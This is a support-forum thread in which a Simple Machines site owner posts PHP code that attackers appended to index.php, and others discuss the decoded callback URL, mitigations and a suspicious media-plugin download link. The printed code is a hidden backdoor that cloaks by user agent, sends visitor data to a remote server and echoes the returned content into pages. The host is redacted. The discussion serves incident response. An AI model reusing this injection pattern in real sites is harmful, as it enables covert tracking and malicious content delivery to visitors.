Nasty, Hidden Virus on Simple Machines

[OCJ]

Update ... hacked again.


Site was a bit slow and then avg browser guard stated giving warnings. I dont have access logs older than a few days and wouldnt know what to look for anyway. It seems like the index.php file was changed - before last data in the raw logs, on the 28th April.

Not sure how they are getting access but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.

Code Select Expand


<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( '{snap}').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

(edit: removed base64 string to render code (semi-)unusable)

[nend]

If you decode the base64 that is in the script you end up with this url.

Code Select Expand

http://{snap}.com/stat/stat.php

The site is unavailable though. 

(edit: removed possible malicious URL)

[青山 素子]

You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site obfuscate the code and URL a bit so people won't be tempted to try things.

[NanoSector]

I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.

[Robert.]

Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it.

[青山 素子]

Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it.

That only  works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.

[OCJ]

update:

One thing happened today that also happened at the time the site was first hacked, and only those times.

This was related to playing movies in Aeva media. It shows a plugin required and link to download. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the aeva movie plugin download link. It didnt work playing the movies either. These actions only happened twice and both coincidentally related to virus trouble through SMF/Aeva media.

I know some so called free firefox plugins from dodgy commercial site have caused similar problems.

Not sure if this error is related or not.

XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2:    <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^